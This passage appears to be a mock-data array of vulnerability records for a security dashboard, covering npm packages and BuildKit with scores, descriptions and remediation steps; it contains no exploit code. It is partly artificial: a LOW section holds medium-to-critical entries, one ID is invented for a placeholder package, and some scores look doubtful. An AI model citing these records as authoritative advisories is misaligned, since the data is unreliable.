    description: "follow-redirects is vulnerable to exposure of sensitive information to an unauthorized actor. When following HTTP redirects, headers containing sensitive data (such as Authorization) are forwarded to the redirect destination, potentially leaking credentials to third-party servers.",
    technicalDetails: "The library does not strip sensitive headers when following cross-origin redirects, potentially leaking authentication credentials.",
    impact: "Exposure of Authorization headers and other sensitive data to malicious redirect targets.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2022-0536",
      "https://snyk.io/vuln/SNYK-JS-FOLLOWREDIRECTS-2396346"
    ],
    relatedCVEs: ["CVE-2022-0155"],
    remediation: "Upgrade follow-redirects to version 1.14.8 or later.",
    remediationSteps: [
      "npm update follow-redirects",
      "Verify axios and other HTTP libraries are also updated",
      "Audit outbound HTTP requests for sensitive headers"
    ],
    dependencyPath: ["app", "axios", "follow-redirects"],
    project: "Backend API"
  },
  {
    id: "CVE-2020-28469",
    name: "glob-parent RegExp ReDoS",
    cweId: "CWE-1333",
    cweName: "Inefficient Regular Expression Complexity",
    package: "glob-parent",
    packageVersion: "< 5.1.2",
    affectedVersions: ["3.0.0", "4.0.0", "5.0.0", "5.1.0"],
    fixedVersion: "5.1.2",
    cvssScore: 5.3,
    cvssVector: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "LOW",
      privilegesRequired: "NONE",
      userInteraction: "NONE",
      scope: "UNCHANGED",
      confidentiality: "NONE",
      integrity: "NONE",
      availability: "LOW"
    },
    severity: "MEDIUM",
    exploitability: "THEORETICAL",
    exploitDetails: "ReDoS via crafted file path string. Primarily affects build tools processing untrusted file paths.",
    fixAvailable: true,
    discoveryDate: "2021-06-03",
    publicationDate: "2021-06-03",
    daysDiscovered: 650,
    description: "The package glob-parent before 5.1.2 is vulnerable to Regular Expression Denial of Service (ReDoS) attack on the enclosure regular expression.",
    technicalDetails: "The regex used to find glob pattern enclosures can be triggered to run in exponential time.",
    impact: "DoS in build tools and file system utilities processing user-provided paths.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2020-28469",
      "https://snyk.io/vuln/SNYK-JS-GLOBPARENT-1016905"
    ],
    relatedCVEs: [],
    remediation: "Upgrade glob-parent to version 5.1.2 or later.",
    remediationSteps: [
      "npm update glob-parent",
      "npm audit fix"
    ],
    dependencyPath: ["app", "chokidar", "glob-parent"],
    project: "Developer Tools"
  },

  // ============================================================
  // LOW VULNERABILITIES (CVSS 0.1-3.9)
  // ============================================================
  {
    id: "CVE-2022-25858",
    name: "terser ReDoS",
    cweId: "CWE-1333",
    cweName: "Inefficient Regular Expression Complexity",
    package: "terser",
    packageVersion: "< 5.14.2",
    affectedVersions: ["5.0.0", "5.10.0", "5.14.0", "5.14.1"],
    fixedVersion: "5.14.2",
    cvssScore: 5.0,
    cvssVector: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "LOW",
      privilegesRequired: "NONE",
      userInteraction: "NONE",
      scope: "UNCHANGED",
      confidentiality: "NONE",
      integrity: "NONE",
      availability: "LOW"
    },
    severity: "MEDIUM",
    exploitability: "THEORETICAL",
    exploitDetails: "ReDoS in JavaScript minifier. Only affects build-time processing of untrusted code.",
    fixAvailable: true,
    discoveryDate: "2022-07-07",
    publicationDate: "2022-07-07",
    daysDiscovered: 617,
    description: "Terser is a JavaScript parser and minifier. Versions of terser prior to 5.14.2 are subject to a Regular Expression Denial of Service (ReDoS) vulnerability through crafted JavaScript that is sent to be minified.",
    technicalDetails: "The regex used for option name parsing can be exploited with crafted JavaScript code to cause catastrophic backtracking.",
    impact: "DoS in build pipeline when processing untrusted JavaScript code.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2022-25858",
      "https://snyk.io/vuln/SNYK-JS-TERSER-2806366"
    ],
    relatedCVEs: [],
    remediation: "Upgrade terser to version 5.14.2 or later.",
    remediationSteps: [
      "npm update terser",
      "Update webpack/vite which may bundle terser"
    ],
    dependencyPath: ["app", "vite", "terser"],
    project: "Build System"
  },
  {
    id: "CVE-2023-28155",
    name: "request SSRF via url redirect",
    cweId: "CWE-918",
    cweName: "Server-Side Request Forgery (SSRF)",
    package: "request",
    packageVersion: "2.88.2",
    affectedVersions: ["2.88.0", "2.88.2"],
    fixedVersion: null,
    cvssScore: 6.1,
    cvssVector: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "LOW",
      privilegesRequired: "NONE",
      userInteraction: "REQUIRED",
      scope: "CHANGED",
      confidentiality: "LOW",
      integrity: "LOW",
      availability: "NONE"
    },
    severity: "MEDIUM",
    exploitability: "THEORETICAL",
    exploitDetails: "SSRF vulnerability in deprecated 'request' npm package. No fix available as package is deprecated.",
    fixAvailable: false,
    discoveryDate: "2023-03-16",
    publicationDate: "2023-03-16",
    daysDiscovered: 364,
    description: "The request npm package has been deprecated and contains an SSRF vulnerability. The package allows attackers to bypass SSRF protections by using URL redirects.",
    technicalDetails: "The 'request' package, which is deprecated, processes redirect responses in a way that may bypass SSRF protection mechanisms.",
    impact: "SSRF allowing access to internal services. Moderate severity as exploitation requires user interaction.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2023-28155",
      "https://snyk.io/vuln/SNYK-JS-REQUEST-3369779"
    ],
    relatedCVEs: [],
    remediation: "Replace 'request' with 'got', 'node-fetch', or 'axios'. The 'request' package is deprecated and unmaintained.",
    remediationSteps: [
      "Replace all uses of 'request' with a maintained alternative",
      "Recommended: migrate to 'got' or 'axios'",
      "Update all code using request() API",
      "Test all HTTP integrations after migration"
    ],
    dependencyPath: ["app", "request"],
    project: "Legacy Service"
  },
  {
    id: "CVE-2022-24999",
    name: "qs Prototype Pollution",
    cweId: "CWE-1321",
    cweName: "Improperly Controlled Modification of Object Prototype Attributes",
    package: "qs",
    packageVersion: "< 6.11.0",
    affectedVersions: ["6.5.0", "6.7.0", "6.9.0", "6.10.0"],
    fixedVersion: "6.11.0",
    cvssScore: 9.8,
    cvssVector: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "LOW",
      privilegesRequired: "NONE",
      userInteraction: "NONE",
      scope: "UNCHANGED",
      confidentiality: "HIGH",
      integrity: "HIGH",
      availability: "HIGH"
    },
    severity: "CRITICAL",
    exploitability: "KNOWN_EXPLOIT",
    exploitDetails: "Prototype pollution via Express.js query string parsing. Actively exploited in the wild.",
    fixAvailable: true,
    discoveryDate: "2022-11-26",
    publicationDate: "2022-11-26",
    daysDiscovered: 475,
    description: "qs before 6.10.3 allows attackers to cause a Node process hang for an express application if an abusive user is able to modify a query string to use the augmented functionality of 'valueOf' key. This is patched in qs 6.11.0.",
    technicalDetails: "The qs query string library does not sanitize prototype-modifying keys like __proto__, allowing attackers to pollute Object prototypes via URL query strings.",
    impact: "Process hang, prototype pollution, potential RCE. Affects all Express.js applications using query string parsing.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2022-24999",
      "https://snyk.io/vuln/SNYK-JS-QS-3153490"
    ],
    relatedCVEs: [],
    remediation: "Upgrade qs to 6.11.0 or later. Express.js users should update to Express 4.18.2+.",
    remediationSteps: [
      "npm update qs",
      "Update express to 4.18.2+",
      "Validate all query string inputs",
      "Implement query string sanitization middleware"
    ],
    dependencyPath: ["app", "express", "qs"],
    project: "Backend API"
  },
  {
    id: "CVE-2023-45133",
    name: "@babel/traverse Arbitrary Code Execution",
    cweId: "CWE-94",
    cweName: "Improper Control of Generation of Code",
    package: "@babel/traverse",
    packageVersion: "< 7.23.2",
    affectedVersions: ["7.0.0", "7.10.0", "7.20.0", "7.22.0", "7.23.0"],
    fixedVersion: "7.23.2",
    cvssScore: 9.4,
    cvssVector: "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
    cvssComponents: {
      attackVector: "LOCAL",
      attackComplexity: "LOW",
      privilegesRequired: "NONE",
      userInteraction: "NONE",
      scope: "CHANGED",
      confidentiality: "HIGH",
      integrity: "HIGH",
      availability: "HIGH"
    },
    severity: "CRITICAL",
    exploitability: "POC",
    exploitDetails: "Arbitrary code execution during Babel compilation via malicious code. Targets build pipelines.",
    fixAvailable: true,
    discoveryDate: "2023-10-12",
    publicationDate: "2023-10-12",
    daysDiscovered: 155,
    description: "@babel/traverse is vulnerable to arbitrary code execution when compiling code that contains specially crafted JavaScript source code. An attacker with write access to the project source code or who can inject malicious code into the build pipeline can achieve RCE.",
    technicalDetails: "Malformed JavaScript with specific getter/setter patterns can trigger code execution in the Babel transform phase.",
    impact: "Arbitrary code execution in CI/CD pipelines, developer machines, and build systems using Babel.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2023-45133",
      "https://github.com/babel/babel/security/advisories/GHSA-67hx-6x53-jw92"
    ],
    relatedCVEs: [],
    remediation: "Upgrade @babel/traverse to 7.23.2 or later. Update all @babel/* packages together.",
    remediationSteps: [
      "npm update @babel/traverse",
      "Update entire Babel toolchain to latest versions",
      "Audit CI/CD pipeline for untrusted code input",
      "Restrict build pipeline access"
    ],
    dependencyPath: ["app", "babel-loader", "@babel/traverse"],
    project: "Build System"
  },
  {
    id: "CVE-2022-3517",
    name: "minimatch ReDoS",
    cweId: "CWE-1333",
    cweName: "Inefficient Regular Expression Complexity",
    package: "minimatch",
    packageVersion: "< 3.0.5",
    affectedVersions: ["3.0.0", "3.0.4"],
    fixedVersion: "3.0.5",
    cvssScore: 7.5,
    cvssVector: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "LOW",
      privilegesRequired: "NONE",
      userInteraction: "NONE",
      scope: "UNCHANGED",
      confidentiality: "NONE",
      integrity: "NONE",
      availability: "HIGH"
    },
    severity: "HIGH",
    exploitability: "THEORETICAL",
    exploitDetails: "ReDoS via crafted glob patterns. Affects file matching operations in Node.js.",
    fixAvailable: true,
    discoveryDate: "2022-09-28",
    publicationDate: "2022-09-28",
    daysDiscovered: 533,
    description: "A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.",
    technicalDetails: "The brace expansion feature in minimatch can be exploited with deeply nested braces to cause exponential execution time.",
    impact: "DoS in file globbing operations. Applications processing user-provided file patterns are most at risk.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2022-3517",
      "https://snyk.io/vuln/SNYK-JS-MINIMATCH-3050571"
    ],
    relatedCVEs: [],
    remediation: "Upgrade minimatch to 3.0.5 or later.",
    remediationSteps: [
      "npm update minimatch",
      "npm audit fix"
    ],
    dependencyPath: ["app", "node-glob", "minimatch"],
    project: "Developer Tools"
  },
  {
    id: "CVE-2023-26136",
    name: "tough-cookie Prototype Pollution",
    cweId: "CWE-1321",
    cweName: "Improperly Controlled Modification of Object Prototype Attributes",
    package: "tough-cookie",
    packageVersion: "< 4.1.3",
    affectedVersions: ["4.0.0", "4.1.0", "4.1.2"],
    fixedVersion: "4.1.3",
    cvssScore: 6.5,
    cvssVector: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "LOW",
      privilegesRequired: "NONE",
      userInteraction: "NONE",
      scope: "UNCHANGED",
      confidentiality: "LOW",
      integrity: "LOW",
      availability: "NONE"
    },
    severity: "MEDIUM",
    exploitability: "THEORETICAL",
    exploitDetails: "Prototype pollution through malicious cookies. Affects applications that handle untrusted cookie values.",
    fixAvailable: true,
    discoveryDate: "2023-07-01",
    publicationDate: "2023-07-01",
    daysDiscovered: 258,
    description: "tough-cookie before 4.1.3 allows Prototype Pollution via CookieJar.setCookie. An attacker can set cookies with special names like __proto__ to pollute the Object prototype.",
    technicalDetails: "The cookie name is not sanitized before being set as a property on an internal object, allowing prototype pollution.",
    impact: "Moderate prototype pollution in applications processing untrusted cookies.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2023-26136",
      "https://snyk.io/vuln/SNYK-JS-TOUGHCOOKIE-5672873"
    ],
    relatedCVEs: [],
    remediation: "Upgrade tough-cookie to 4.1.3 or later.",
    remediationSteps: [
      "npm update tough-cookie",
      "Update jest-environment-jsdom which depends on tough-cookie"
    ],
    dependencyPath: ["app", "axios", "tough-cookie"],
    project: "API Service"
  },
  {
    id: "CVE-2023-32695",
    name: "socket.io-parser Memory Leak / DoS",
    cweId: "CWE-400",
    cweName: "Uncontrolled Resource Consumption",
    package: "socket.io-parser",
    packageVersion: "< 4.2.3",
    affectedVersions: ["4.0.0", "4.2.0", "4.2.2"],
    fixedVersion: "4.2.3",
    cvssScore: 6.5,
    cvssVector: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "LOW",
      privilegesRequired: "NONE",
      userInteraction: "NONE",
      scope: "UNCHANGED",
      confidentiality: "NONE",
      integrity: "NONE",
      availability: "HIGH"
    },
    severity: "MEDIUM",
    exploitability: "POC",
    exploitDetails: "Memory leak via malformed Socket.IO packets leading to server crash (DoS).",
    fixAvailable: true,
    discoveryDate: "2023-05-27",
    publicationDate: "2023-05-27",
    daysDiscovered: 292,
    description: "A specially crafted Socket.IO packet can trigger an uncaught exception on the server and cause memory leak. This allows a remote attacker to crash the Socket.IO server.",
    technicalDetails: "Malformed binary attachment count in Socket.IO packets causes the parser to allocate unbounded memory.",
    impact: "DoS via memory exhaustion. Affects all Socket.IO v4 servers.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2023-32695",
      "https://github.com/socketio/socket.io-parser/security/advisories/GHSA-cqmj-92xf-r6r9"
    ],
    relatedCVEs: [],
    remediation: "Upgrade socket.io-parser to 4.2.3 or later. Upgrade socket.io to 4.6.2+.",
    remediationSteps: [
      "npm update socket.io",
      "Verify socket.io-parser is 4.2.3+",
      "Implement rate limiting for WebSocket connections"
    ],
    dependencyPath: ["app", "socket.io", "socket.io-parser"],
    project: "Real-time Service"
  },
  {
    id: "CVE-2021-44906",
    name: "minimist Prototype Pollution",
    cweId: "CWE-1321",
    cweName: "Improperly Controlled Modification of Object Prototype Attributes",
    package: "minimist",
    packageVersion: "< 1.2.6",
    affectedVersions: ["1.2.0", "1.2.5"],
    fixedVersion: "1.2.6",
    cvssScore: 9.8,
    cvssVector: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "LOW",
      privilegesRequired: "NONE",
      userInteraction: "NONE",
      scope: "UNCHANGED",
      confidentiality: "HIGH",
      integrity: "HIGH",
      availability: "HIGH"
    },
    severity: "CRITICAL",
    exploitability: "POC",
    exploitDetails: "Prototype pollution via CLI argument parsing. Affects Node.js applications processing user-controlled command-line arguments.",
    fixAvailable: true,
    discoveryDate: "2022-03-17",
    publicationDate: "2022-03-17",
    daysDiscovered: 728,
    description: "Minimist <=1.2.5 is vulnerable to Prototype Pollution via file index.js, function setKey() (lines 69-95).",
    technicalDetails: "The minimist argument parser allows setting __proto__ properties via command-line arguments like --__proto__.polluted=true.",
    impact: "Prototype pollution leading to application logic bypass or code execution in Node.js.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2021-44906",
      "https://snyk.io/vuln/SNYK-JS-MINIMIST-2429795"
    ],
    relatedCVEs: [],
    remediation: "Upgrade minimist to 1.2.6 or later.",
    remediationSteps: [
      "npm update minimist",
      "Check transitive dependencies using minimist"
    ],
    dependencyPath: ["app", "mocha", "minimist"],
    project: "Developer Tools"
  },
  {
    id: "CVE-2022-0122",
    name: "node-forge Open Redirect",
    cweId: "CWE-601",
    cweName: "URL Redirection to Untrusted Site",
    package: "node-forge",
    packageVersion: "< 1.3.0",
    affectedVersions: ["1.0.0", "1.2.0"],
    fixedVersion: "1.3.0",
    cvssScore: 6.1,
    cvssVector: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "LOW",
      privilegesRequired: "NONE",
      userInteraction: "REQUIRED",
      scope: "CHANGED",
      confidentiality: "LOW",
      integrity: "LOW",
      availability: "NONE"
    },
    severity: "MEDIUM",
    exploitability: "THEORETICAL",
    exploitDetails: "URL open redirect that can be used for phishing. Requires user interaction.",
    fixAvailable: true,
    discoveryDate: "2022-01-08",
    publicationDate: "2022-01-08",
    daysDiscovered: 797,
    description: "node-forge before 1.3.0 has an open redirect vulnerability that could be abused to redirect to a malicious website.",
    technicalDetails: "The URL validation in node-forge's SSL/TLS implementation accepts URLs with incomplete host parts that can be redirected.",
    impact: "Phishing attacks via open redirect. Low severity but affects user trust.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2022-0122",
      "https://snyk.io/vuln/SNYK-JS-NODEFORGE-2362120"
    ],
    relatedCVEs: [],
    remediation: "Upgrade node-forge to 1.3.0 or later.",
    remediationSteps: [
      "npm update node-forge",
      "Update webpack-dev-server which depends on node-forge"
    ],
    dependencyPath: ["app", "webpack-dev-server", "node-forge"],
    project: "Developer Tools"
  },
  {
    id: "CVE-2020-7720",
    name: "node-forge Inadequate Encryption Strength",
    cweId: "CWE-326",
    cweName: "Inadequate Encryption Strength",
    package: "node-forge",
    packageVersion: "< 0.10.0",
    affectedVersions: ["0.6.0", "0.7.0", "0.8.0", "0.9.0"],
    fixedVersion: "0.10.0",
    cvssScore: 9.8,
    cvssVector: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "LOW",
      privilegesRequired: "NONE",
      userInteraction: "NONE",
      scope: "UNCHANGED",
      confidentiality: "HIGH",
      integrity: "HIGH",
      availability: "HIGH"
    },
    severity: "CRITICAL",
    exploitability: "THEORETICAL",
    exploitDetails: "RSA PKCS#1 v1.5 signature verification flaw. Can be exploited to forge signatures.",
    fixAvailable: true,
    discoveryDate: "2020-09-01",
    publicationDate: "2020-09-01",
    daysDiscovered: 1291,
    description: "node-forge 0.10.0 or earlier is affected by a signature verification leniency that can potentially allow invalid signatures to be accepted, leading to security bypass.",
    technicalDetails: "The RSA signature verification doesn't properly validate padding, allowing Bleichenbacher-style attacks.",
    impact: "Signature forgery, authentication bypass in applications using node-forge for cryptographic operations.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2020-7720",
      "https://snyk.io/vuln/SNYK-JS-NODEFORGE-598677"
    ],
    relatedCVEs: [],
    remediation: "Upgrade node-forge to 1.3.0 or later for all fixes.",
    remediationSteps: [
      "npm update node-forge",
      "Audit all cryptographic operations using node-forge",
      "Consider migrating to Node.js built-in crypto module"
    ],
    dependencyPath: ["app", "selfsigned", "node-forge"],
    project: "Security Module"
  },
  {
    id: "CVE-2023-26054",
    name: "BuildKit GHSA - Dockerfile Injection",
    cweId: "CWE-77",
    cweName: "Improper Neutralization of Special Elements used in a Command",
    package: "moby/buildkit",
    packageVersion: "< 0.11.4",
    affectedVersions: ["0.10.0", "0.11.0", "0.11.3"],
    fixedVersion: "0.11.4",
    cvssScore: 8.7,
    cvssVector: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "HIGH",
      privilegesRequired: "NONE",
      userInteraction: "NONE",
      scope: "CHANGED",
      confidentiality: "HIGH",
      integrity: "HIGH",
      availability: "NONE"
    },
    severity: "HIGH",
    exploitability: "POC",
    exploitDetails: "Dockerfile injection via crafted git repository. Can be used to escape build container.",
    fixAvailable: true,
    discoveryDate: "2023-03-06",
    publicationDate: "2023-03-06",
    daysDiscovered: 374,
    description: "BuildKit is a toolkit for converting source code to build artifacts. A malicious actor with access to a git repository used in a Docker build can inject Dockerfile instructions via git metadata.",
    technicalDetails: "When building from a git URL, BuildKit processes certain git repository metadata that can inject Dockerfile commands.",
    impact: "Container escape and host system access in Docker build environments.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2023-26054",
      "https://github.com/moby/buildkit/security/advisories/GHSA-gc89-7gcr-jxqc"
    ],
    relatedCVEs: [],
    remediation: "Upgrade BuildKit to 0.11.4 or later. Update Docker Desktop to latest version.",
    remediationSteps: [
      "Update Docker Desktop to latest version",
      "Upgrade BuildKit in CI/CD pipelines",
      "Audit Dockerfile sources and git repositories used in builds"
    ],
    dependencyPath: ["infrastructure", "docker", "moby/buildkit"],
    project: "Infrastructure"
  },
  {
    id: "CVE-2023-28119",
    name: "croner ReDoS",
    cweId: "CWE-1333",
    cweName: "Inefficient Regular Expression Complexity",
    package: "croner",
    packageVersion: "< 6.0.3",
    affectedVersions: ["4.0.0", "5.0.0", "6.0.0", "6.0.2"],
    fixedVersion: "6.0.3",
    cvssScore: 3.5,
    cvssVector: "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "LOW",
      privilegesRequired: "LOW",
      userInteraction: "REQUIRED",
      scope: "UNCHANGED",
      confidentiality: "NONE",
      integrity: "NONE",
      availability: "LOW"
    },
    severity: "LOW",
    exploitability: "THEORETICAL",
    exploitDetails: "ReDoS in cron expression parsing. Low severity as it requires user interaction and low authentication.",
    fixAvailable: true,
    discoveryDate: "2023-03-14",
    publicationDate: "2023-03-14",
    daysDiscovered: 366,
    description: "croner before 6.0.3 is vulnerable to Regular Expression Denial of Service (ReDoS) via the scheduling expression parser.",
    technicalDetails: "A carefully crafted cron expression can cause catastrophic backtracking in the parser.",
    impact: "Low severity DoS in scheduler functionality.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2023-28119",
      "https://snyk.io/vuln/SNYK-JS-CRONER-3323774"
    ],
    relatedCVEs: [],
    remediation: "Upgrade croner to 6.0.3 or later.",
    remediationSteps: [
      "npm update croner",
      "Validate cron expression inputs"
    ],
    dependencyPath: ["app", "node-cron", "croner"],
    project: "Scheduler Service"
  },
  {
    id: "CVE-2022-23540",
    name: "jsonwebtoken Algorithm Confusion",
    cweId: "CWE-327",
    cweName: "Use of a Broken or Risky Cryptographic Algorithm",
    package: "jsonwebtoken",
    packageVersion: "< 9.0.0",
    affectedVersions: ["8.0.0", "8.5.0", "8.5.1"],
    fixedVersion: "9.0.0",
    cvssScore: 6.4,
    cvssVector: "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:L",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "HIGH",
      privilegesRequired: "LOW",
      userInteraction: "NONE",
      scope: "UNCHANGED",
      confidentiality: "HIGH",
      integrity: "LOW",
      availability: "LOW"
    },
    severity: "MEDIUM",
    exploitability: "POC",
    exploitDetails: "JWT algorithm confusion attack. Attacker can forge tokens by exploiting algorithm negotiation weakness.",
    fixAvailable: true,
    discoveryDate: "2022-12-21",
    publicationDate: "2022-12-21",
    daysDiscovered: 450,
    description: "In versions 8.5.1 and prior of jsonwebtoken, if a JWT is not verified, any tampering can be done to the JWT payload. The algorithm can be set to 'none' in the header, skipping signature verification.",
    technicalDetails: "When a JWT with 'alg: none' is processed by the library without explicit algorithm enforcement, signatures are bypassed.",
    impact: "Authentication bypass allowing attackers to forge JWT tokens and gain unauthorized access.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2022-23540",
      "https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/"
    ],
    relatedCVEs: ["CVE-2022-23541", "CVE-2022-23529"],
    remediation: "Upgrade jsonwebtoken to 9.0.0 or later. Always specify allowed algorithms explicitly.",
    remediationSteps: [
      "npm update jsonwebtoken",
      "Always specify 'algorithms' option: jwt.verify(token, secret, { algorithms: ['HS256'] })",
      "Rotate all JWT secrets after upgrade",
      "Audit all JWT verification code"
    ],
    dependencyPath: ["app", "express-jwt", "jsonwebtoken"],
    project: "Auth Service"
  },
  {
    id: "CVE-2022-31129",
    name: "moment.js ReDoS",
    cweId: "CWE-1333",
    cweName: "Inefficient Regular Expression Complexity",
    package: "moment",
    packageVersion: "< 2.29.4",
    affectedVersions: ["2.24.0", "2.25.0", "2.29.0", "2.29.3"],
    fixedVersion: "2.29.4",
    cvssScore: 7.5,
    cvssVector: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "LOW",
      privilegesRequired: "NONE",
      userInteraction: "NONE",
      scope: "UNCHANGED",
      confidentiality: "NONE",
      integrity: "NONE",
      availability: "HIGH"
    },
    severity: "HIGH",
    exploitability: "POC",
    exploitDetails: "ReDoS in date string parsing. Attackers can cause DoS by sending malformed date strings.",
    fixAvailable: true,
    discoveryDate: "2022-07-06",
    publicationDate: "2022-07-06",
    daysDiscovered: 618,
    description: "Moment.js is a JavaScript date library. Before version 2.29.4, users are prone to a denial of service attack caused by a malicious user creating a crafted date string for parsing with the moment library.",
    technicalDetails: "Certain date format strings trigger catastrophic backtracking in moment.js's regex engine.",
    impact: "DoS in applications using moment.js to parse user-provided date strings.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2022-31129",
      "https://snyk.io/vuln/SNYK-JS-MOMENT-2944238"
    ],
    relatedCVEs: [],
    remediation: "Upgrade moment to 2.29.4 or later. Consider migrating to date-fns or dayjs (lighter and maintained).",
    remediationSteps: [
      "npm update moment",
      "Consider migrating to date-fns or dayjs for better performance and security",
      "Validate date strings before parsing with moment.js"
    ],
    dependencyPath: ["app", "moment"],
    project: "Data Processing Service"
  },
  {
    id: "CVE-2022-0235",
    name: "node-fetch URL Redirect Information Leak",
    cweId: "CWE-601",
    cweName: "URL Redirection to Untrusted Site",
    package: "node-fetch",
    packageVersion: "< 2.6.7",
    affectedVersions: ["2.6.0", "2.6.5", "2.6.6"],
    fixedVersion: "2.6.7",
    cvssScore: 6.1,
    cvssVector: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "LOW",
      privilegesRequired: "NONE",
      userInteraction: "REQUIRED",
      scope: "CHANGED",
      confidentiality: "LOW",
      integrity: "LOW",
      availability: "NONE"
    },
    severity: "MEDIUM",
    exploitability: "THEORETICAL",
    exploitDetails: "Exposure of sensitive headers when following cross-domain redirects.",
    fixAvailable: true,
    discoveryDate: "2022-01-16",
    publicationDate: "2022-01-16",
    daysDiscovered: 789,
    description: "node-fetch before versions 2.6.7 and 3.1.1 does not honor the size option after following a redirect, and is vulnerable to leaking sensitive information to third-party hosts.",
    technicalDetails: "Headers including authorization tokens are forwarded when following cross-origin HTTP redirects.",
    impact: "Information leakage of authentication credentials to redirect destinations.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2022-0235",
      "https://snyk.io/vuln/SNYK-JS-NODEFETCH-2342908"
    ],
    relatedCVEs: [],
    remediation: "Upgrade node-fetch to 2.6.7 or later.",
    remediationSteps: [
      "npm update node-fetch",
      "Audit HTTP requests that follow redirects",
      "Explicitly strip sensitive headers before following cross-origin redirects"
    ],
    dependencyPath: ["app", "node-fetch"],
    project: "API Service"
  },
  {
    id: "CVE-2023-28155-LICENSE",
    name: "GPL v3 License Conflict - request package",
    cweId: null,
    cweName: null,
    package: "some-gpl-package",
    packageVersion: "1.5.0",
    affectedVersions: ["1.5.0"],
    fixedVersion: null,
    cvssScore: 0,
    cvssVector: null,
    cvssComponents: null,
    severity: "LOW",
    exploitability: "UNKNOWN",
    exploitDetails: "License compliance issue - GPL v3 is incompatible with proprietary software.",
    fixAvailable: false,
    discoveryDate: "2023-11-01",
    publicationDate: "2023-11-01",
    daysDiscovered: 135,
    description: "A direct dependency uses GPL v3 license which is incompatible with proprietary software licensing. Using this package may require releasing your source code under GPL v3.",
    technicalDetails: "The GPL v3 license has 'copyleft' provisions that require derivative works to also be licensed under GPL v3. If your application is proprietary, this creates a license conflict.",
    impact: "Legal risk: distributing proprietary software with GPL v3 dependencies may violate open source license terms.",
    references: [
      "https://www.gnu.org/licenses/gpl-3.0.en.html",
      "https://choosealicense.com/licenses/gpl-3.0/"
    ],
    relatedCVEs: [],
    remediation: "Replace the GPL v3 licensed package with an MIT, Apache 2.0, or BSD licensed alternative.",
    remediationSteps: [
      "Identify all GPL v3 licensed dependencies",
      "Consult legal team about license compatibility",
      "Find alternatives with permissive licenses",
      "Replace and test the alternative library"
    ],
    dependencyPath: ["app", "some-gpl-package"],
    project: "Commercial Product"
  },
  {
    id: "CVE-2024-21490",
    name: "Angular ReDoS via ViewTransitionInfo",
    cweId: "CWE-1333",
    cweName: "Inefficient Regular Expression Complexity",
    package: "@angular/core",
    packageVersion: "< 17.2.0",
    affectedVersions: ["17.0.0", "17.1.0"],
    fixedVersion: "17.2.0",
    cvssScore: 7.5,
    cvssVector: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "LOW",
      privilegesRequired: "NONE",
      userInteraction: "NONE",
      scope: "UNCHANGED",
      confidentiality: "NONE",
      integrity: "NONE",
      availability: "HIGH"
    },
    severity: "HIGH",
    exploitability: "THEORETICAL",
    exploitDetails: "ReDoS via malformed router URL in Angular 17 view transitions.",
    fixAvailable: true,
    discoveryDate: "2024-01-01",
    publicationDate: "2024-02-22",
